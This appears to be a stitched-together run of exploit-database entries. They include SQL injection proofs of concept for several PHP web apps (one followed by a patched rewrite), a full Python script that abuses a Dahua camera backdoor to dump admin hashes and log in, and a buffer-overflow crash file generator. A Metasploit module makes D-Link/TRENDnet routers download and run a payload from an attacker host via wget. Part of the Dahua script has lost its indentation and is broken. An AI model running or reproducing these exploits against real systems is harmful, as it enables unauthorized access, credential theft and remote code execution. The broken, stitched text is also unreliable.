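         . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

/**
 * Abort the request unless it is a POST carrying the session's token.
 * hash_equals() keeps the comparison constant-time.
 */
function csrf_verify(): void
{
    $sent = $_POST['csrf_token'] ?? '';
    if ($_SERVER['REQUEST_METHOD'] !== 'POST'
        || !isset($_SESSION['csrf_token'])
        || !hash_equals($_SESSION['csrf_token'], $sent)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
}

// In homeedit.php, deleting an income record becomes:
if (isset($_POST['delincome'])) {
    csrf_verify();
    $incomeId = (int) $_POST['delincome'];
    // ... then a prepared DELETE scoped to the logged-in user's own rows ...
}

// The delete button in the rendered page is a POST form whose markup includes
// the output of csrf_field() next to a hidden "delincome" input and a submit button;
// the GET link "homeedit.php?delincome=778" is no longer honoured.
```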
# Exploit Title: Daily Expense Manager 1.0 - 'term' SQLi
# Date: February 25th, 2024
# Exploit Author: Stefan Hesselman
# Vendor Homepage: https://code-projects.org/daily-expense-manager-in-php-with-source-code/
# Software Link: https://download-media.code-projects.org/2020/01/DAILY_EXPENSE_MANAGER_IN_PHP_WITH_SOURCE_CODE.zip
# Version: 1.0
# Tested on: Kali Linux
# CVE: N/A
# CWE: CWE-89, CWE-74
## Description
Daily Expense Manager is vulnerable to SQL injection attacks. The affected HTTP parameter is the 'term' parameter. Any remote, unauthenticated attacker
can exploit the vulnerability by injecting additional, malicious SQL queries to be run on the database.
## Vulnerable endpoint:
http://example.com/Daily-Expense-Manager/readxp.php?term=asd
## Vulnerable HTTP parameter:
term (GET)
## Exploit proof-of-concept:
http://example.com/Daily-Expense-Manager/readxp.php?term=asd%27%20UNION%20ALL%20SELECT%201,@@version,3,4,5,6--%20-
## Vulnerable PHP code:
File: /Daily-Expense-Manager/readxp.php, Lines: 16-23
<?php
[...]
//get search term
$searchTerm = $_GET['term']; # unsanitized and under control of the attacker.
//get matched data from skills table
$query = $conn->query("SELECT * FROM expense WHERE pname like '%$searchTerm%' AND uid='$sid' and isdel='0' group by pname");
while ($row = $query->fetch_assoc()) {
    $data[] = $row['pname'];
}
//return json data
echo json_encode($data);
?>
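A rewrite of `readxp.php` as an added example (not the project's code) that binds both `term` and the session user id and, the point binding alone does not cover, escapes LIKE wildcards so a search term cannot widen the pattern. `$conn` and `$sid` are assumed to be the same connection and session user id as in the original; the function names are hypothetical.

```php
<?php
// Added example (not the project's code): readxp.php with the 'term' parameter
// and the session user id as bound parameters, and LIKE wildcards escaped.
// Assumes the same mysqli connection $conn and session user id $sid as the original.

/**
 * Build a LIKE pattern that matches the literal term as a substring.
 * '!' is used as the escape character so the result does not depend on
 * MySQL's backslash handling (sql_mode NO_BACKSLASH_ESCAPES).
 */
function like_contains(string $term): string
{
    $escaped = str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $term);
    return '%' . $escaped . '%';
}

/** Return the distinct expense names of this user that contain the search term. */
function search_expense_names(mysqli $conn, int $sid, string $term): array
{
    $pattern = like_contains($term);
    $stmt = $conn->prepare(
        "SELECT pname FROM expense
          WHERE pname LIKE ? ESCAPE '!' AND uid = ? AND isdel = '0'
          GROUP BY pname"
    );
    $stmt->bind_param('si', $pattern, $sid);
    $stmt->execute();
    $stmt->bind_result($pname);
    $names = [];
    while ($stmt->fetch()) {
        $names[] = $pname;
    }
    $stmt->close();
    return $names;          // [] when nothing matches, never null
}

// Endpoint body: the content type is set explicitly so the browser does not
// sniff the JSON response as HTML.
$term = (string) ($_GET['term'] ?? '');
header('Content-Type: application/json; charset=utf-8');
echo json_encode(search_expense_names($conn, (int) $sid, $term));
```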
# # # # #
# Exploit Daily Deals Script v1.0 - SQL Injection
# Google Dork: N/A
# Date: 07.03.2017
# Vendor Homepage: http://www.icloudcenter.com/
# Software : http://www.icloudcenter.com/daily_deals_site.htm
# Demo: http://icloudcenter.net/demos/icgroupdeals/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/deal.php?id=[SQL]
# # # # #
#!/usr/bin/python2.7
if False: '''
2017-05-03
Public rerelease of Dahua Backdoor PoC
https://github.com/mcw0/PoC/blob/master/dahua-backdoor-PoC.py
2017-03-20
With my newfound knowledge of vulnerable devices out there with an unbelievable number of more than 1 million Dahua / OEM units, where knowledge comes from a report made by NSFOCUS and my own research on shodan.io.
With this knowledge, I will not release the Python PoC to the public as before said of April 5, as it is not necessary when the PoC has already been verified by IPVM and other independent security researchers.
However, I'm open to share the PoC with serious security researchers if so desired, please e-mail me off list and be clear about who you are so I do not take you for a beggar, which I ignore.
NSFOCUS report: http://blog.nsfocus.net/dahua-cameras-unauthorized-access-vulnerability-technical-analysis-solution/
/bashis
[STX]
I'm speechless, and almost don't know what I should write... I (hardly) can't believe what I have just found.
I have just discovered (what I strongly believe is a backdoor) in Dahua DVR/NVR/IPC and possibly all their clones.
Since I am convinced this is a backdoor, I have my own policy to NOT notify the vendor before the community.
(I simply don't want to listen on their poor excuses, their tryings to keep me silent for informing the community)
In short:
You can delete/add/change names of the admin users, you can change passwords of the admin users - this backdoor simply doesn't care about that!
It uses whatever names and passwords you configure - by simply downloading the full user database and using your own credentials!
This is so simple as:
1. Remotely download the full user database with all credentials and permissions
2. Choose whatever admin user, copy the login names and password hashes
3. Use them as source to remotely login to the Dahua devices
This is like a damn Hollywood hack, click on one button and you are in...
Below PoC you will find here: https://github.com/mcw0/PoC/dahua-backdoor.py
Update:
Dahua has requested me to temporarily remove the PoC code, will be back here again 5th April. (30 days)
/Sorry, bashis
Please have understanding of the quick hack of the PoC, I'm sure it could be done better.
Have a nice day
/bashis
$ ./dahua-backdoor.py --rhost 192.168.5.2
[*] [Dahua backdoor Generation 2 & 3 (2017 bashis <mcw noemail eu>)]
[i] Remote target IP: 192.168.5.2
[i] Remote target PORT: 80
[>] Checking for backdoor version
[<] 200 OK
[!] Generation 2 found
[i] Chosing Admin Login: 888888, PWD hash: 4WzwxXxM
[>] Requesting our session ID
[<] 200 OK
[>] Logging in
[<] 200 OK
{ "id" : 10000, "params" : null, "result" : true, "session" : 100385023 }
[>] Logging out
[<] 200 OK
[*] All done...
$
$ ./dahua-backdoor.py --rhost 192.168.5.3
[*] [Dahua backdoor Generation 2 & 3 (2017 bashis <mcw noemail eu>)]
[i] Remote target IP: 192.168.5.3
[i] Remote target PORT: 80
[>] Checking for backdoor version
[<] 200 OK
[!] Generation 3 Found
[i] Choosing Admin Login: admin, Auth: 27
[>] Requesting our session ID
[<] 200 OK
[i] Downloaded MD5 hash: 94DB0778856B11C0D0F5455CCC0CE074
[i] Random value to encrypt with: 1958557123
[i] Built password: admin:1958557123:94DB0778856B11C0D0F5455CCC0CE074
[i] MD5 generated password: 2A5F4F7E1BB6F0EA6381E4595651A79E
[>] Logging in
[<] 200 OK
{ "id" : 10000, "params" : null, "result" : true, "session" : 1175887285 }
[>] Logging out
[<] 200 OK
[*] All done...
$
[ETX]
'''
#
# Dahua backdoor PoC Generation 2 and 3
# Author: bashis <mcw noemail eu> March 2017
# Credentials: No Credentials needed (Exploited as Anonymous)
# Note: PoC intentionally missing essential details to be direct usable for anything else than login/logout.
#
# Vendor URL: http://www.dahuasecurity.com/
#
# Patched firmware can be downloaded from newly introduced 'Firmware download function'
# (Don't mind the old date stamps, these should all be the hotfixed updates)
# http://www.dahuasecurity.com/download_111.html
#
#
# -[ Facts ]-
#
# 1) Requirements
# 1.1) You need to know what you want to request
# 1.2) You need to know how to request what you want
# - When you know this, remote device will give you what you want, without any complains
# 1.3) You need to know how to process the results of your requests
# 1.4) You need to know how to send your processed results back to remote device
# - When you know this, you will be granted full access to remote device, without any complains
#
# 2) Direct file access
# 2.1) /mnt/mtd/Config/{passwd|Account1} downloadable with /current_config/{passwd|Account1} by HTTP/HTTPS
# 2.2) User database hash in format: <username>:<realm>:<password>
# 2.3) /mnt/mtd are read/writable - so sensitive files could (must!) be somewhere else, protected, and not remotely accessible.
# 2.4) /mnt/mtd/Config contains also of intentionally public accessible files (WebCapConfig and preLanguage)
# 2.5) There are several other files that should (must!) not be remotely accessible either (Config1 for example)
#
# 3) Passing the hash
# 3.1) Generation 1 - Base64 encoded (Not in this PoC, since I don't know what I want to request, but I could guess same format as 2.2)
# 3.2) Generation 2 - No processing needed; only to pass on the hash
# 3.3) Generation 3 - New 'improved' MD5 random hash must be generated with additional details, that we simply request from the remote device
# 3.4) New MD5 random hash has to be generated as: <username>:<random>:[MD5 format as in user database (2.2)]
#
# - Not less than three times, Dahua have been poking around in the file structure and in the relevant functions of the source code
# - Changed file names, structure of user database, added/removed both public and sensitive files.
# - And never once wondered;
# 1. 'Hm, why I'm allowed to access these newly added files without login request?'
# 2. 'Hm, I know that file is the user database, can I access that one too without login request?'
# 3. 'Hm, I know that file is the device config, can I access that one too without login request?'
# - Really? Are you kidding me?
#
# When you know all above, and have full access to remote device, the whole thing looks so easy, actually way too easy to be true.
#
#
# -[ Most importantly ]-
#
# 1) Undocumented direct access to certain file structures, and used from some of Dahua's own .js to load 'WebCapConfig' and 'preLanguage'
# 2) Direct and indirect re-usage of hashes possible, however with MD5 hash 'security improvements' in Generation 3
# 3) Essential needs for successful login we simply request from remote device and process, no need to guess nor bruteforce anything
# 4) Abnormally wide range of products and firmware versions that share same reliable attack method, to be 'just a vulnerability'
# - True vulnerability over a wide range products and firmware versions have always some unexpected anomalies, which is expected
# 5) Dahua has lots of debug code compiled into the Firmware that may/normally listening on TCP/6789, although protected by l/p authorization
# - Dahua has been kindly asked to remove all debug code from production firmware, as this access and code do not belong in end user devices
# 6) The admin account '888888' is claimed by Dahua to be limited for local login with 'monitor and mouse' only, and not from remote
# - However, that validation is done locally in users browser by 'loginEx.js', and has therefore no practical effect
# 7) The 'hotfix' remediation was done by hardcoding from full access to two intentionally public accessible files (WebCapConfig and preLanguage)
#
#
# -[ Did Dahua confirm the backdoor by mistake? ]-
#
# Don't know if you noticed that the 'new' patches that were pushed out days after my initial post at IPVM,
# they had different old date stamps, and same old date stamps (as on the archives) was on all inside binaries as well.
#
# Screenshots
# https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20Timestamp.png
# https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20listing.png
#
# URL
# http://us.dahuasecurity.com/en/us/Security-Bulletin_030617.php
# https://dahuawiki.com/images/Firmware/DVR/Q2.2017/
#
# And, bit interesting, Dahua continued to use old date stamps on newly generated firmware updates/hotfixes
#
# -[ Method of discovery ]-
#
# Researching by disassembling Dahua's main binaries 'Challenge' / 'Sonia'
# What got me curious was the abnormally empty inside of the image I was initially checking, and of course the big binary 'Challenge'
# What got me on track, was the lack of references to sensitive files
# Missing user database and Config in the archives, only a unused and read-only /etc/passwd was found
# Noticed that sensitive files was generated by the binary at startup
# Noticed checkings after sensitive files in different directories, to use 'defaults' as last resource
# Noticed the mix of intentionally public files and sensitive files in same directory
# Reading of the .htm and .js that was found in the image
# ...etc.
#
#
# -[ My Full Disclosure Policy ]-
#
# Normal vulnerabilities: I collect enough information about my findings and try to notify the vendor to have coordinated disclosure
# Backdoors: If/when they are intended, the vendors wants to hide/keep them (of course), what would you suggest? Notify the vendor or Full Disclosure?
# Proof of claim: Screenshots or some Youtube video would not prove anything, so the claim couldn't be posted without real hard cold facts
# - Professionals within the CCTV industry needed to know, and the only place I knew were many of them, was at IPVM, and therefore the first post was made there.
#
#
# -[ Next Generation Backdoors ]-
#
# That is in my opinion vendors P2P Cloud solutions.
#
# With P2P, these kind of backdoor implementations as shown in this PoC will then not be needed,
# since with P2P you practically giving away your credentials and addresses to your devices!
# And the connection to P2P, your devices initiates and keeps open. (For me, it is similar to reverse shell)
#
#
# -[ Hat's ]-
#
# I don't wear hats, I wear caps... (when it's cold)
#
#
# -[ Function of this PoC code ]-
#
# 1) Check and dump the remote user database (Generation 2 or 3)
# 2) Find first available admin user and extract their login/pwd hash
# 3) Request session ID, compute new hash if needed (Generation 3)
# 4) Login and logout to/from remote device
#
#
# -[ Credits ]-
#
# binwalk (https://github.com/devttys0/binwalk)
# - Nothing easy could been done without binwalk, awesome tool. Thanks!
#
# IPVM (https://ipvm.com/)
# - For pickup of the claim and to make PoC report, so this Python PoC could be taken down.
#
# Full Disclosure (http://seclists.org/fulldisclosure/)
# - For existing, without your e-mail list, sensitive stuff would be quite difficult to uncover.
# - Fyodor, thanks again.
#
# And, big thanks to all authors for all other stuff and tools that's needed to successfully execute research within binaries
# - To many for naming.
#
# Have a nice day
# /bashis
#
import string
import sys
import socket
import argparse
import urllib, urllib2, httplib
import base64
import ssl
import json
import commentjson # pip install commentjson
import hashlib
class HTTPconnect:
    def __init__(self, host, proto, verbose, creds, Raw):
        self.host = host
        self.proto = proto
        self.verbose = verbose
        self.credentials = creds
        self.Raw = Raw

    def Send(self, uri, query_headers, query_data, ID):
        self.uri = uri
        self.query_headers = query_headers
        self.query_data = query_data
        self.ID = ID
        # Connect-timeout in seconds
        timeout = 5
        socket.setdefaulttimeout(timeout)
        url = '{}://{}{}'.format(self.proto, self.host, self.uri)
        if self.verbose:
            print "[Verbose] Sending:", url
        if self.proto == 'https':
            if hasattr(ssl, '_create_unverified_context'):
                print "[i] Creating SSL Unverified Context"
                ssl._create_default_https_context = ssl._create_unverified_context
        if self.credentials:
            Basic_Auth = self.credentials.split(':')
            if self.verbose:
                print "[Verbose] User:", Basic_Auth[0], "Password:", Basic_Auth[1]
            try:
                pwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
                pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1])
                auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr)
                opener = urllib2.build_opener(auth_handler)
                urllib2.install_opener(opener)
            except Exception as e:
                print "[!] Basic Auth Error:", e
                sys.exit(1)
        if self.query_data:
            request = urllib2.Request(url, data=json.dumps(self.query_data), headers=self.query_headers)
        else:
            request = urllib2.Request(url, None, headers=self.query_headers)
        response = urllib2.urlopen(request)
        # print response
        if response:
            print "[<] {} OK".format(response.code)
            if self.Raw:
                return response
            else:
                html = response.read()
                return html


class Dahua_Backdoor:
    def __init__(self, rhost, proto, verbose, creds, Raw):
        self.rhost = rhost
        self.proto = proto
        self.verbose = verbose
        self.credentials = creds
        self.Raw = Raw

    #
    # Generation 2
    #
    def Gen2(self, response, headers):
        self.response = response
        self.headers = headers
        html = self.response.readlines()
        if self.verbose:
            for lines in html:
                print "{}".format(lines)
        #
        # Check for first available admin user
        #
        for line in html:
            if line[0] == "#" or line[0] == "\n":
                continue
            line = line.split(':')[0:25]
            if line[3] == '1':  # Check if user is in admin group
                USER_NAME = line[1]  # Save login name
                PWDDB_HASH = line[2]  # Save hash
                print "[i] Choosing Admin Login [{}]: {}, PWD hash: {}".format(line[0], line[1], line[2])
                break
        #
        # Login 1
        #
        print "[>] Requesting our session ID"
        query_args = {"method": "global.login",
                      "params": {
                          "userName": USER_NAME,
                          "password": "",
                          "clientType": "Web3.0"},
                      "id": 10000}
        URI = '/RPC2_Login'
        response = HTTPconnect(self.rhost, self.proto, self.verbose, self.credentials, self.Raw).Send(URI, headers, query_args, None)
        json_obj = json.load(response)
        if self.verbose:
            print json.dumps(json_obj, sort_keys=True, indent=4, separators=(',', ': '))
        #
        # Login 2
        #
        print "[>] Logging in"
        query_args = {"method": "global.login",
                      "session": json_obj['session'],
                      "params": {
                          "userName": USER_NAME,
                          "password": PWDDB_HASH,
                          "clientType": "Web3.0",
                          "authorityType": "OldDigest"},
                      "id": 10000}
        URI = '/RPC2_Login'
        response = HTTPconnect(self.rhost, self.proto, self.verbose, self.credentials, self.Raw).Send(URI, headers, query_args, json_obj['session'])
        print response.read()
        #
        # Wrong username/password
        # { "error" : { "code" : 268632071, "message" : "Component error: password not valid!" }, "id" : 10000, "result" : false, "session" : 1997483520 }
        # { "error" : { "code" : 268632070, "message" : "Component error: user's name not valid!" }, "id" : 10000, "result" : false, "session" : 1997734656 }
        #
        # Successful login
        # { "id" : 10000, "params" : null, "result" : true, "session" : 1626533888 }
        #
        #
        # Logout
        #
        print "[>] Logging out"
        query_args = {"method": "global.logout",
                      "params": "null",
                      "session": json_obj['session'],
                      "id": 10001}
        URI = '/RPC2'
        response = HTTPconnect(self.rhost, self.proto, self.verbose, self.credentials, self.Raw).Send(URI, headers, query_args, None)
        return response

    #
    # Generation 3
    #
    def Gen3(self, response, headers):
        self.response = response
        self.headers = headers
        json_obj = commentjson.load(self.response)
        if self.verbose:
            print json.dumps(json_obj, sort_keys=True, indent=4, separators=(',', ': '))
        #
        # Check for first available admin user
        #
        for who in json_obj[json_obj.keys()[0]]:
            if who['Group'] == 'admin':  # Check if user is in admin group
                USER_NAME = who['Name']  # Save login name
                PWDDB_HASH = who['Password']  # Save hash
                print "[i] Choosing Admin Login: {}".format(who['Name'])
                break
        #
        # Request login
        #
        print "[>] Requesting our session ID"
        query_args = {"method": "global.login",
                      "params": {
                          "userName": USER_NAME,
                          "password": "",
                          "clientType": "Web3.0"},
                      "id": 10000}
        URI = '/RPC2_Login'
        response = HTTPconnect(self.rhost, self.proto, self.verbose, self.credentials, self.Raw).Send(URI, headers, query_args, None)
        json_obj = json.load(response)
        if self.verbose:
            print json.dumps(json_obj, sort_keys=True, indent=4, separators=(',', ': '))
        #
        # Generate login MD5 hash with all required info we have downloaded
        #
        RANDOM = json_obj['params']['random']
        PASS = '' + USER_NAME + ':' + RANDOM + ':' + PWDDB_HASH + ''
        RANDOM_HASH = hashlib.md5(PASS).hexdigest().upper()
        print "[i] Downloaded MD5 hash:", PWDDB_HASH
        print "[i] Random value to encrypt with:", RANDOM
        print "[i] Built password:", PASS
        print "[i] MD5 generated password:", RANDOM_HASH
        #
        # Login
        #
        print "[>] Logging in"
        query_args = {"method": "global.login",
                      "session": json_obj['session'],
                      "params": {
                          "userName": USER_NAME,
                          "password": RANDOM_HASH,
                          "clientType": "Web3.0",
                          "authorityType": "Default"},
                      "id": 10000}
        URI = '/RPC2_Login'
        response = HTTPconnect(self.rhost, self.proto, self.verbose, self.credentials, self.Raw).Send(URI, headers, query_args, json_obj['session'])
        print response.read()
        # Wrong username/password
# { "error" : { "code" : 268632071, "message" : "Component error: password not valid!" }, "id" : 10000, "result" : false, "session" : 1156538295 }
# { "error" : { "code" : 268632070, "message" : "Component error: user's name not valid!" }, "id" : 10000, "result" : false, "session" : 1175812023 }
#
# Successfull login
# { "id" : 10000, "params" : null, "result" : true, "session" : 1175746743 }
#
#
# Logout
#
print "[>] Logging out"
query_args = {"method":"global.logout",
"params":"null",
"session":json_obj['session'],
"id":10001}
URI = '/RPC2'
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw).Send(URI,headers,query_args,None)
return response
#
# Validate correctness of HOST, IP and PORT
#
class Validate:
def __init__(self,verbose):
self.verbose = verbose
# Check if IP is valid
def CheckIP(self,IP):
self.IP = IP
ip = self.IP.split('.')
if len(ip) != 4:
return False
for tmp in ip:
if not tmp.isdigit():
return False
i = int(tmp)
if i < 0 or i > 255:
return False
return True
# Check if PORT is valid
def Port(self,PORT):
self.PORT = PORT
if int(self.PORT) < 1 or int(self.PORT) > 65535:
return False
else:
return True
# Check if HOST is valid
def Host(self,HOST):
self.HOST = HOST
try:
# Check valid IP
socket.inet_aton(self.HOST) # Will generate exeption if we try with DNS or invalid IP
# Now we check if it is correct typed IP
if self.CheckIP(self.HOST):
return self.HOST
else:
return False
except socket.error as e:
# Else check valid DNS name, and use the IP address
try:
self.HOST = socket.gethostbyname(self.HOST)
return self.HOST
except socket.error as e:
return False
if __name__ == '__main__':
#
# Help, info and pre-defined values
#
INFO = '[Dahua backdoor Generation 2 & 3 (2017 bashis <mcw noemail eu>)]\n'
HTTP = "http"
HTTPS = "https"
proto = HTTP
verbose = False
raw_request = True
rhost = '192.168.5.2' # Default Remote HOST
rport = '80' # Default Remote PORT
creds = False # creds = 'user:pass'
#
# Try to parse all arguments
#
try:
arg_parser = argparse.ArgumentParser(
prog=sys.argv[0],
description=('[*] '+ INFO +' [*]'))
arg_parser.add_argument('--rhost', required=False, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']')
arg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']')
if creds:
arg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ creds + ']')
arg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]')
arg_parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Verbose mode [Default: False]')
args = arg_parser.parse_args()
except Exception as e:
print INFO,"\nError: %s\n" % str(e)
sys.exit(1)
# We want at least one argument, so print out help
if len(sys.argv) == 1:
arg_parser.parse_args(['-h'])
print "\n[*]",INFO
if args.verbose:
verbose = args.verbose
#
# Check validity, update if needed, of provided options
#
if args.https:
proto = HTTPS
if not args.rport:
rport = '443'
if creds and args.auth:
creds = args.auth
if args.rport:
rport = args.rport
if args.rhost:
rhost = args.rhost
# Check if RPORT is valid
if not Validate(verbose).Port(rport):
print "[!] Invalid RPORT - Choose between 1 and 65535"
sys.exit(1)
# Check if RHOST is valid IP or FQDN, get IP back
rhost = Validate(verbose).Host(rhost)
if not rhost:
print "[!] Invalid RHOST"
sys.exit(1)
#
# Validation done, start print out stuff to the user
#
if args.https:
print "[i] HTTPS / SSL Mode Selected"
print "[i] Remote target IP:",rhost
print "[i] Remote target PORT:",rport
rhost = rhost + ':' + rport
headers = {
'X-Requested-With' : 'XMLHttpRequest',
'X-Request' : 'JSON',
'User-Agent':'Dahua/2.0; Dahua/3.0'
}
#
# Try to find /current_config/passwd user database (Generation 2)
#
try:
print "[>] Checking for backdoor version"
URI = "/current_config/passwd"
response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,headers,None,None)
print "[!] Generation 2 found"
reponse = Dahua_Backdoor(rhost,proto,verbose,creds,raw_request).Gen2(response,headers)
except urllib2.HTTPError as e:
#
# If not, try to find /current_config/Account1 user database (Generation 3)
#
if e.code == 404:
try:
URI = '/current_config/Account1'
response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,headers,None,None)
print "[!] Generation 3 Found"
response = Dahua_Backdoor(rhost,proto,verbose,creds,raw_request).Gen3(response,headers)
except urllib2.HTTPError as e:
if e.code == 404:
print "[!] Patched or not Dahua device! ({})".format(e.code)
sys.exit(1)
else:
print "Error Code: {}".format(e.code)
except Exception as e:
print "[!] Detect of target failed ({})".format(e)
sys.exit(1)
print "\n[*] All done...\n"
sys.exit(0)
#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: D3DGear 5.00 Build 2175 - Buffer Overflow
# Date: 07-11-2017
# Vulnerable Software: D3DGear 5.00 Build 2175
# Vendor Homepage: http://www.d3dgear.com/
# Version: 5.00 Build 2175
# Software Link: http://www.d3dgear.com/products.htm
# Tested On: Windows 7 x86
#
#
# PoC: generate crash.txt, open program, select broadcast, paste crash.txt contents in stream key
#
# app crashes; 00420042 Pointer to next SEH record; no eip overwrite; one unicode ppr pointer
#
file = "crash.txt"
buffer = "A"* 1284 + "B"*4
writeFile = open (file, "w")
writeFile.write( buffer )
writeFile.close()
<!--
# # # # #
# Exploit Title: D-Park Pro Domain Parking Script 1.0 - SQL Injection
# Dork: N/A
# Date: 30.10.2017
# Vendor Homepage: http://www.domainzaar.com/
# Software Link: http://www.domainzaar.com/
# Demo: http://www.d-park-pro.com/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2017-15958
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# # # # #
-->
<form id="loginform" action="http://localhost/[PATH]/admin/loginform.php" method="post">
<label for="form_username">Username:</label>
<input type="text" name="username" value="' UNION ALL SELECT 0x31,0x32,0x33,CONCAT(0x494853414e2053454e43414e)-- Ver Ayari" />
<label for="form_password">Password:</label>
<input type="password" name="password" id="form_password" />
<input name="login" value="Log In" type="submit">
</form>
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking # Only tested on Emulated environment

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'D-Link/TRENDnet NCC Service Command Injection',
      'Description'    => %q{
        This module exploits a remote command injection vulnerability on several routers. The
        vulnerability exists in the ncc service, while handling ping commands. This module has
        been tested on a DIR-626L emulated environment. Several D-Link and TRENDnet devices
        are reported as affected, including: D-Link DIR-626L (Rev A) v1.04b04, D-Link DIR-636L
        (Rev A) v1.04, D-Link DIR-808L (Rev A) v1.03b05, D-Link DIR-810L (Rev A) v1.01b04, D-Link
        DIR-810L (Rev B) v2.02b01, D-Link DIR-820L (Rev A) v1.02B10, D-Link DIR-820L (Rev A)
        v1.05B03, D-Link DIR-820L (Rev B) v2.01b02, D-Link DIR-826L (Rev A) v1.00b23, D-Link
        DIR-830L (Rev A) v1.00b07, D-Link DIR-836L (Rev A) v1.01b03 and TRENDnet TEW-731BR (Rev 2)
        v2.01b01
      },
      'Author'         =>
        [
          'Peter Adkins <peter.adkins[at]kernelpicnic.net>', # Vulnerability discovery and initial PoC
          'Tiago Caetano Henriques', # Vulnerability discovery and initial PoC
          'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2015-1187'],
          ['BID', '72816'],
          ['URL', 'https://github.com/darkarnium/secpub/tree/master/Multivendor/ncc2'],
          ['URL', 'http://seclists.org/fulldisclosure/2015/Mar/15'],
          ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10052']
        ],
      'Targets'        =>
        # Only tested on D-Link DIR-626L where wget is available
        [
          [ 'Linux mipsel Payload',
            {
              'Arch' => ARCH_MIPSLE,
              'Platform' => 'linux'
            }
          ],
          [ 'Linux mipsbe Payload',
            {
              'Arch' => ARCH_MIPSBE,
              'Platform' => 'linux'
            }
          ],
        ],
      'DisclosureDate' => 'Feb 26 2015',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('WRITABLEDIR', [ true, 'A directory where we can write files', '/tmp' ]),
        OptString.new('EXTURL', [ false, 'An alternative host to request the EXE payload from' ]),
        OptString.new('TARGETURI', [true, 'The base path to the vulnerable application area', '/ping.ccp']),
        OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 10])
      ], self.class)
  end

  def check
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri'    => normalize_uri(target_uri.path)
      })

      # unknown if other devices also using mini_httpd
      if res && [500].include?(res.code) && res.headers['Server'] && res.headers['Server'] =~ /mini_httpd/
        return Exploit::CheckCode::Detected
      end
    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Unknown
    end

    Exploit::CheckCode::Unknown
  end

  def exec_command(cmd, timeout = 20)
    begin
      res = send_request_cgi({
        'method'        => 'POST',
        'uri'           => normalize_uri(target_uri.path),
        'encode_params' => false,
        'vars_post'     => {
          'ccp_act'   => 'ping_v6',
          'ping_addr' => '$(' + cmd + ')'
        }
      }, timeout)
      return res
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
    end
  end

  def primer
    @payload_url = get_uri
    wget_payload
  end

  def exploit
    print_status("Accessing the vulnerable URL...")

    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::NoTarget, "#{peer} - Failed to access the vulnerable URL")
    end

    print_status("Exploiting...")

    @pl = generate_payload_exe
    @payload_url = ''
    @dropped_elf = rand_text_alpha(rand(5) + 3)

    if datastore['EXTURL'].blank?
      begin
        Timeout.timeout(datastore['HTTPDELAY']) { super }
      rescue Timeout::Error
      end
      chmod_payload
      exec_payload
    else
      @payload_url = datastore['EXTURL']
      wget_payload
      chmod_payload
      exec_payload
    end
  end

  def wget_payload
    upload_path = File.join(datastore['WRITABLEDIR'], @dropped_elf)
    cmd = "wget${IFS}#{@payload_url}${IFS}-O${IFS}#{upload_path}"
    print_status("Downloading the payload to the target machine...")
    res = exec_command(cmd)
    if res && [200].include?(res.code) && res.headers['Server'] && res.headers['Server'] =~ /mini_httpd/
      register_files_for_cleanup(upload_path)
    else
      fail_with(Failure::Unknown, "#{peer} - Failed to download the payload to the target")
    end
  end

  def chmod_payload
    cmd = "chmod${IFS}777${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)}"
    print_status("chmod the payload...")
    res = exec_command(cmd, 1)
    unless res
      fail_with(Failure::Unknown, "#{peer} - Unable to chmod payload")
    end
    Rex.sleep(1)
  end

  def exec_payload
    cmd = File.join(datastore['WRITABLEDIR'], @dropped_elf)
    print_status("Executing the payload...")
    res = exec_command(cmd, 1)
    unless res
      fail_with(Failure::Unknown, "#{peer} - Unable to exec payload")
    end
    Rex.sleep(1)
  end

  # Handle incoming requests to the HTTP server
  def on_request_uri(cli, request)
    print_status("Request: #{request.uri}")
    if request.uri =~ /#{Regexp.escape(get_resource)}/
      print_status('Sending payload...')
      send_response(cli, @pl)
    end
  end
end
source: https://www.securityfocus.com/bid/51918/info
D-Link ShareCenter products are prone to multiple remote code-execution vulnerabilities.
Successful exploits will result in the execution of arbitrary code in the context of the affected application. Failed exploit attempts may result in a denial-of-service condition.
